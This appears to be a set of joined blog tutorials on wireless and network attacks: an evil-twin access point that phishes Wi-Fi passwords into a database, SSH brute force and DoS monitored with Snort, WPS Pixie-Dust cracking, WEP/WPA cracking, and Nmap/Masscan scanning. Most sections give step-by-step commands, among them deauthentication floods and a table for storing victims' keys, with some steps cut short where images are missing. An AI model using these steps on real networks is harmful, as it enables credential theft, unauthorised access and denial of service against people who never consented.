EVIL TWIN ATTACK An evil twin, in the subject of network security, is a fake or rouge (WAP) wireless access point that appears as a genuine hotspot offered by a legitimate provider. In an evil twin attack, an eavesdropper or hacker fraudulently creates this rogue hotspot to collect the personal data of unsuspecting users. Sensitive data can be stolen by spying on a connection or using a phishing technique. For example, a hacker using an evil twin exploit may be positioned near an authentic Wi-Fi access point and discover the service set identifier (SSID) and frequency. The hacker may then send a radio signal using the exact same frequency and SSID. To end users, the rogue evil twin appears as their legitimate hotspot with the same name. Installing required tools: Open terminal and type: #apt-get install dnsmasq -y to install latest version of dhcp server in Kali Linux. Configure tools: Create a configuration file for dnsmasq using nano editor. Configuration file dnsmasq: Save dnsmasq.conf file and exit. Puting wireless adapter into monitor mode #airmon-ng start wlan0 Now our card is in monitor mode without any issues with network manager. We can simply start monitoring the air with command #airodump-ng wlan0mon Copy our target’s details for further reference Display all wireless adapter connected with kali linux Set tx-power of wireless adapter wlan0mon to max=1000mW(30dBm) tx-power stands for transmission power. By default it is set to 20dBm(Decibel metre) or 100mW. tx-power in mW increases 10 times with every 10 dBm. See the dBm to mW table. If your country is set to US while installation. then your card should operate on 30 dBm (1000 mW) Start Evil Twin Attack Begin the Evil Twin attack using airbase-ng: By default, airbase-ng creates a tap interface(at0) as the wired interface for bridging/routing the network traffic via the rogue access point. you can see it using ifconfig at0 command. For the at0 to allocate IP address we need to assign an IP range to itself first. Allocate ip and subnet mask For the at0 to allocate IP address we need to assign an IP range to itself first. The Class A IP address, 10.0.0.1, matches the dhcp-option parameter of dnsmasq.conf file. Which means at0 will act as the default gateway under dnsmasq Now we will use our default Internet-facing interface, eth0, to route all the traffic from the client through it. In other words, allowing the victim to access the internet and allowing ourselves(attacker) to sniff that traffic. For that, we will use iptables utility to set a firewall rule to route all the traffic through at0 exclusively. You will get similar output if using VM Enable NAT by setting Firewall rules in iptables Make sure you enter correct interface for –out-interface. eth0 here is the upstream interface where we want to send out packets, coming from at0 interface (rogue AP). Rest is fine. After entering the above command if you are willing to provide Internet access to the victim just enable routing using the command below. Enable IP Forwarding Entering “1” in the ip_forward file will tell the system to enable the rules defined in the IPtables and start forwarding traffic(if any). 0 stand for disabling. Although rules will remain defined until the next reboot. Start DHCP Listner #dnsmasq -C ~/Desktop/dnsmasq.conf -d Start Services Download Rogue AP configuration files Getting files from cdn.rootsh3ll.com for fake AP to display fake administrator page for enter password by victim. Unziping of Rogue_AP.zip This command will extract the contents of rogue_AP.zip file and copy them to the apache’s HTML directory so that when the victim opens the browser s/he will automatically be redirected to the default index.html webpage. Database Configuration Log in root user #mysql -u root -p Create new user fakeap and password fakeap. As you cannot execute MySQL queries from PHP being a root user since version 5.7 mysql>create user fakeap@localhost identified by ‘fakeap’; now create database and table as defined in the dbconnect.php mysql>create database rogue_AP; mysql>use rogue_AP; mysql>create table wpa_keys(password1 varchar(32), password2 varchar(32)); Grant fakeap all the permissions on rogue_AP Database mysql> grant all privileges on rogue_AP.* to ‘fakeap’@’localhost’; Exit Log in using new user mysql> mysql -u fakeap -p Select rouge_AP database mysql> use rogue_AP; Insert a test value in the table mysql> insert into wpa_keys(password1, password2) values (“testpass”, “testpass”); mysql> select * from wpa_keys; Note that both the values are same here, that means password and confirmation password should be the same. Evil Twin attack is now ready; however, we need to wait for the client to connect and see the credential coming. In some cases, your client might already be connected to the original AP. You need to disconnect the client forcefully using aireplay-ng utility. This is called a deauthentication attack. Attacker sends carefully crafted packets with the BSSID of the Access Point in the air telling every client to de-authenticate. Connected clients honor the command and disconnect themselves. De-authentication: #aireplay-ng –deauth 0 -a FC:DD:55:08:4F:C2 wlan0mon –deauth 0 = unlimited deauthentication request -a = BSSID As soon as a client connects to our Fake AP we will see activity in the airbase-ng terminal window like this As soon as a client connects to our Fake AP we will see activity in the DHCP Listener terminal window like this DNS Spoofing It Spoof the all web URLs surfing by victim. Victim can now access the Internet. You can Sniff the client traffic at this stage: When victim tries to access any website(google.com in this case), s/he will see this page which tell the victim to enter the password to download and upgrade the firmware. Then Victim type password After Submit password. The Credential save in our(attackers) database. And victim shows upgrading page. After that victim can access internet by this victim cannot doubt on this attack. Just go to the previously used command in the mySQL terminal window and see whether a new update is there or not. After simulating I checked the mySQL DB and here […]
SSH Brute force & DoS Attack With Snort & Analyzing in Wireshark This article is for attacking on system, monitoring attack, and Analyse generated logs. In this article there is a scenario, in this scenario there are two machines. one machine is victim’s machine and second one is attacker’s machine. In between two among one firewall is there, this firewall will be installed on victim’s machine. Then attacker will attack on victim’s machine and at the same time using victim’s machine firewall monitor live attack and then Analyse log. In this scenario Kali Linux operating system will install in victim’s machine and cyborg hawk operating system will install in attacker’s machine. Also Snort firewall will install in victim’s machine. Then attacker will perform two attack on victim’s system. First attack is SSH attack and second attack is DOS attack. In SSH attack attacker will gain access victim’s machine. In DOS attack attacker will crash victim’s machine. Victim machine Attacker machine What is SSH Attack? The SSH attack are brute-force attack which is different time of attempts to authenticate the remote SSH server. The dictionary attack is the best example of brute-force attack. In other type of brute-force attack is the combination of letters and numbers also try commonly used passwords. A brute-force attack is trial-and-error iteration function which is used for obtain user password or PIN (Personal Identification Number). In Brute-force attack many automated tools are available such as : 1. Hydra3 2. Cain & Able 3. John the Ripper Port Scanning Port Scanning using Zenmap: Port Scanning using Nmap: Brute force Dictionary for Attack: Brute force using Hydra: Gain Victim’s Remote Access Gain Victim’s Remote Access using SSH: Output Kill Snort after Gaining Access: Snort After killing Victim’s Machine: Logs Port Scanning LogsMonitoring: Analyse: Brute Force Attack LogsMonitoring: Analyse: Gaining Access LogsMonitoring: Analyse: Introduction to DOS Attack A DoS (Denial of Service) attack is an attack which is used for inaccessible or shut down the machine or network. Using DoS attack attacker will be flooding the target with traffic, and sending it information that also crash. The Main Impact of the DoS attack disturb the user to accessing the computer or network resources. Bandwidth attacks: Bandwidth attack is the overflows the network with heavy traffic using existing network resources. Connectivity attacks: Connectivity attack is the overflows the system with too more number of connection requests are coming which consume all Operating system resources by this it make not accessible and non-responsive for the user requests. DOS using HPING3 Output After DOS Victim’s O.S.: After DOS Victim’s Drive: Kcore File: SNORT logs generate after dos and logs size: Logs Monitoring: Analyse:
Best Way to Crack WPS Pin | Cybogram Wi-Fi Protected Setup WPS is a standard for network security, created for a secure wireless home network. The WPS (Wi-Fi Protected Setup) introduce by Wi-Fi Alliance in 2006, The main purpose of this protocol is to allow home users who know little of wireless security and may be intimidated by the all available security options to line up for WPA (Wi-Fi Protected Access), in addition as making it easy to features new devices to an existing network without entering long passphrases. before the quality, several competing solutions were developed by different vendors to deal with the identical need. December 2011, A major security flaw was revealed. Its Affects the wireless routers with WPS PIN feature, it is most recent models have automatically enabled by default. This flaw allows the remote attacker to recover the PIN of WPS in few Minutes and hour time with brute-force attack and The WPS PIN, WPA/WPA2 Key. Users are urged to show off the WPS PIN feature, although this could not be possible on some router models. Why Wi-Fi Protected Setup Is Insecure The Component of the WPS: PIN: The router encompasses a eight-digit PIN that you just must enter on your devices to attach. It is not Check entire 8-digit PIN at once, The WPS security checks first four-digit and the last four digit differently not at same time. For this the brute force attack is very easy to guess the combination of it. There are Only 11000 possible combination of Four-digit code, so it is very easily to Brute force to get First Four digits and the attacker can go for next four digit. Many consumer routers don’t day out after a wrong WPS PIN is provided, allowing attackers to guess over and another time. A WPS PIN will be brute-force in a couple of day. Anyone uses software the “Reaver” for cracking a WPS PIN. Push-Button-Connect: Rather than entering a PIN or passphrase, you’ll simply push a physical button on the router after trying to attach. (The button may be a software button on a setup screen.) this can be safer, as devices can only connect with this method for some minutes after the button is pressed or after one device connects. It won’t move and available to take advantage of all the time, as a WPS PIN is. Push-button-connect seems largely secure, with the sole vulnerability being that anyone with physical access to the router could push the button and connect, whether or not they didn’t know the Wi-Fi passphrase. Tool used for cracking WPS PIN Installation: #git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git #cd airgeddon ~/airgeddon/# bash airgeddon.sh Select Interface to work with: Select Second option Put interface in monitor mode for putting adapter in monitor mode. Select option for attack: then select 8. WPS attacks menu Select option for which attack on WPS (Router) After opened WPS attacks menu, we have to select 7. Option bully pixie attack to attack target. Enter BSSID, Channel, Timeout value and path: Then we already selected interface and putted in monitor mode. Then select target by type target bssid. Then set channel, and type timeout time (value in seconds). If we want to save password in text file to particular path then type particular path else it stores on default path. Then press enter. WPS bully pixie dust attack started: The process is running for cracking the pin. A Pixie-Dust attack works by brute forcing the key for a protocol called WPS. WPS is a easy process to access a router it is also for attacker. A Wi-Fi Protected Setup Pin is the 8-digit PSKs or Pre-Shared Keys. Each key has half the PIN. To Understand how the attack Pixie Dust works You will require to understand how the requests to Access Point Work: We successfully cracked the WPS pin. There’s the password! This type of attack would not work on all router, but it is more effective from a Brute force attack. Pixie Dust: maximum 30 minutes vs Brute Force: minutes to DAYS
What is Wireless? The word wireless is dictionary defined as “having no wires”. In networking terminology, wireless is the term used to describe any computer network where there is no physical wired connection between sender and receiver, but rather the network is connected by radio waves and/or microwaves to maintain communications. Wireless networking utilizes specific equipment such as NICs, APs and routers in place of wires (copper or optical-fibre) for connectivity. Wireless technology started in the early 20th century with radiotelegraphy using Morse code. When the process of modulation was introduced, it became possible to transmit voices, music and other sounds wirelessly. This medium then came to be known as radio. Due to the demand of data communication, the need for a larger portion of the spectrum of wireless signals became a requirement and the term wireless gained widespread use. When the word wireless is mentioned, people most often mean wireless computer networking as in Wi-Fi or cellular telephony, which is the backbone of personal communications. Common everyday wireless technologies include: 802.11 Wi-Fi: Wireless networking technology for personal computersBluetooth: Technology for interconnecting small devicesGlobal System for Mobile Communication (GSM): De facto mobile phone standard in many countriesTwo-Way Radio: Radio communications, as in amateur and citizen band radio services, as well as business and military communications What is Penetration Testing? A penetration test, also known as a pen test, is a simulated cyberattack against your computer system to check for exploitable vulnerabilities. In the context of web application security, penetration testing is commonly used to augment a web application firewall. Pen testing can involve the attempted breaching of any number of application systems, (e.g., application protocol interfaces (APIs), frontend/backend servers) to uncover vulnerabilities, such as un-sanitized inputs that are susceptible to code injection attacks. Insights provided by the penetration test can be used to fine-tune your WAF security policies and patch detected vulnerabilities. Phases of Penetration Testing? Penetration Testing Phases What is Wireless Penetration Testing? Wireless Penetration testing is the Actively Examine the Process of Information security Measures which is Placed in Wireless Networks and also analyses the Weakness, technical flows, and Critical wireless Vulnerabilities. Most important counter Measures we should focus on Threat Assessment, Data theft Detection, security control auditing, Risk prevention and Detection, information system Management, Upgrade infrastructure and the Detailed report should be prepared WEP (Wired Equivalent Privacy) WEP: Wired Equivalent Privacy (WEP) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard, 802.11b, that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN. A wired local area network (LAN) is generally protected by physical security mechanisms (controlled access to a building, for example) that are effective for a controlled physical environment, but may be ineffective for WLANs because radio waves are not necessarily bound by the walls containing the network. WEP seeks to establish similar protection to that offered by the wired network’s physical security measures by encrypting data transmitted over the WLAN. Data encryption protects the vulnerable wireless link between clients and access points; once this measure has been taken, other typical LAN security mechanisms such as password protection, end-to-end encryption, virtual private networks (VPNs), and authentication can be put in place to ensure privacy. Step 1: Check Wireless adapter connected with system Open a terminal and type the following command and hit enter as shown in the figure below. #iwconfig Step 2: Setting Up adapter in monitor mode Open a terminal and type the following command and hit enter as shown in the figure below. #airmon-ng start wlan0 Airmon-ng start wlan0 Step 3: Searching for Access Points around you Open a terminal and type the following command and hit enter as shown in the figure below. #airodump-ng wlan0mon Airodump-ng Step 4: Capturing Packets of selected access point Now let’s capture packets of the WIFI that we want to hack. Type the following command to do so. # airodump-ng –bssid 7C:8B:CA:46:B2:F9 -c 4 -w my1 wlan0mon Airodump-ng for Particular SSID after that my1-01.cap file is stored. Step 5: Deauth. Packets Request for handshaking Open a terminal and type the following command and hit enter as shown in the figure below. #aireplay-ng -0 0 -a 7C:8B:CA:46:B2:F9 wlan0mon Aireplay-ng After 2 or 3 minutes close it for reauth. victim Step 6: Cracking the Password using aircrack-ng Open a terminal and type the following command and hit enter as shown in the figure below. #aircrack-ng ‘/root/Desktop/my1-01.cap’ Aircrack-ng We have successfully cracked the password. WPA (Wi-Fi Protected Access) WPA (Wi-Fi Protected Access) Wi-Fi Protected Access (WPA), Wi-Fi Protected Access II (WPA2), and Wi-Fi Protected Access 3 (WPA3) are three security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. The Alliance defined these in response to serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP). Difference between WPA, WPA2, WPA3 WPA The Wi-Fi Alliance intended WPA as an intermediate measure to take the place of WEP pending the availability of the full IEEE 802.11i standard. WPA could be implemented through firmware upgrades on wireless network interface cards designed for WEP that began shipping as far back as 1999. However, since the changes required in the wireless access points (APs) were more extensive than those needed on the network cards, most pre-2003 APs could not be upgraded to support WPA. The WPA protocol implements much of the IEEE 802.11i standard. Specifically, the Temporal Key Integrity Protocol (TKIP) was adopted for WPA. WEP used a 64-bit or 128-bit encryption key that must be manually entered on wireless access points and devices and does not change. TKIP employs a per-packet key, meaning that it dynamically generates a new 128-bit key for each packet and thus prevents the types of attacks that compromised WEP. WPA2 WPA2 replaced WPA. WPA2, which requires testing and certification by the Wi-Fi Alliance, implements the mandatory elements of IEEE 802.11i. In particular, it includes mandatory support for CCMP, an AES-based […]
Nmap Nmap is a very powerful tool to discovering info regarding machines on a network or the web (internet). Nmap allow to prove a system with packets for detect all information / everything from the running services and details about open ports for the Operating System and Version of Software. MassScan MASSCAN is similar tool of Nmap, it is Nmap on massive overdrive. MASSCAN can scan entire internet in 6 minute and provide reports. It is best network scanner we also can say word class network scanner. masscan uses a custom TCP/IP stack and can conflict with other tools. The installation of MASSCAN is easy and quick. The MASSCAN repo found here https://github.com/robertdavidgraham/masscan os 1. ip = 192.168.118.131 os 2. ip = 192.168.118.133 ssh service start in os 2. . start apache service in os 2. using nmap scan os 2 from os 1. using masscan scan os 2 form os 1. scan google.com using nmap in os 1 scan google.com using mass scan in os 1. ping google.com. See the ip 18.104.22.168 and using nmap scan that ip from os 1. using masscan scan 22.214.171.124 ip address from os 1. now using masscan scan the all avilable host in that network And same thing do with nmap. Conclusion In single IP address nmap is give good result but when we scan network then masscan performance is better than nmap.